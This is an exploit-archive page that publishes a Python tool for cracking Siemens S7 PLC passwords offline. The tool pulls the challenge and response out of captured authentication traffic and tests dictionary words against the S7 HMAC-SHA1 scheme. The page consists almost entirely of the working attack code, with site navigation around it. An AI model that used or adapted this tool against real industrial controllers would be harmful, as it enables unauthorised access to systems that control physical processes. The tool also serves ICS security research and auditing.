exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

S7 Password Offline Bruteforce Tool

S7 Password Offline Bruteforce Tool
Posted Jan 21, 2013
Authored by Alexander Timorin, Dmitry Sklyarov | Site ptsecurity.com

S7 Password offline bruteforcing tool written in Python.

tags | cracker, python
SHA-256 | 878839bd23896003334de59ea25bee609cb1e1ed6bc559a6d7ff2fd0ba72c3a3

S7 Password Offline Bruteforce Tool

Change Mirror Download
"""
File: s7-brute-offline.py
Desc: offline password bruteforsing based on challenge-response data, extracted from auth traffic dump file

Alexander Timorin, Dmitry Sklyarov
http://scadastrangelove.org

Version: 0.1 (just for demo, don't kick my ass plz)
"""

import sys
import hashlib
import hmac
from binascii import hexlify
try:
from scapy.all import *
except ImportError:
print "please install scapy: http://www.secdev.org/projects/scapy/ "
sys.exit()


cfg_pcap_file = '/root/siemens/RE_S7/stop_cpu_cmd_right_pass_123.pcap'
cfg_dictionary_file = 'dict.txt'

def get_challenge_response():
r = rdpcap(cfg_pcap_file)

lens = map(lambda x: x.len, r)
pckt_lens = dict([(i, lens[i]) for i in range(0,len(lens))])

# try to find challenge packet
pckt_108 = 0 #challenge packet (from server)
for (pckt_indx, pckt_len) in pckt_lens.items():
if pckt_len+14 == 108 and hexlify(r[pckt_indx].load)[14:24] == '7202002732':
pckt_108 = pckt_indx
break

# try to find response packet
pckt_141 = 0 #response packet (from client)
_t1 = dict([ (i, lens[i]) for i in pckt_lens.keys()[pckt_108:] ])
for pckt_indx in sorted(_t1.keys()):
pckt_len = _t1[pckt_indx]
if pckt_len+14 == 141 and hexlify(r[pckt_indx].load)[14:24] == '7202004831':
pckt_141 = pckt_indx
break

# try to find auth result packet
pckt_84 = 0 # auth answer from plc: pckt_len==84 -> auth ok
pckt_92 = 0 # auth answer from plc: pckt_len==92 -> auth bad
for pckt_indx in sorted(_t1.keys()):
pckt_len = _t1[pckt_indx]
if pckt_len+14 == 84 and hexlify(r[pckt_indx].load)[14:24] == '7202000f32':
pckt_84 = pckt_indx
break
if pckt_len+14 == 92 and hexlify(r[pckt_indx].load)[14:24] == '7202001732':
pckt_92 = pckt_indx
break

print "found packets indeces: pckt_108=%d, pckt_141=%d, pckt_84=%d, pckt_92=%d" % (pckt_108, pckt_141, pckt_84, pckt_92)
if pckt_84:
print "auth ok"
else:
print "auth bad. for brute we need right auth result. exit"
sys.exit()

challenge = None
response = None

raw_challenge = hexlify(r[pckt_108].load)
if raw_challenge[46:52] == '100214' and raw_challenge[92:94] == '00':
challenge = raw_challenge[52:92]
print "found challenge: %s" % challenge
else:
print "cannot find challenge. exit"
sys.exit()

raw_response = hexlify(r[pckt_141].load)
if raw_response[64:70] == '100214' and raw_response[110:112] == '00':
response = raw_response[70:110]
print "found response: %s" % response
else:
print "cannot find response. exit"
sys.exit()

return challenge, response

def calculate_s7response(password, challenge):
challenge = challenge.decode("hex")
return hmac.new( hashlib.sha1(password).digest(), challenge, hashlib.sha1).hexdigest()

if __name__ == '__main__':
print "using pcap file: %s" % cfg_pcap_file
challenge, response = get_challenge_response()
print "start password bruteforsing ..."
for p in open(cfg_dictionary_file):
p = p.strip()
if response == calculate_s7response(p, challenge):
print "found password: %s" % p
sys.exit()
print "password not found. try another dictionary."

Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close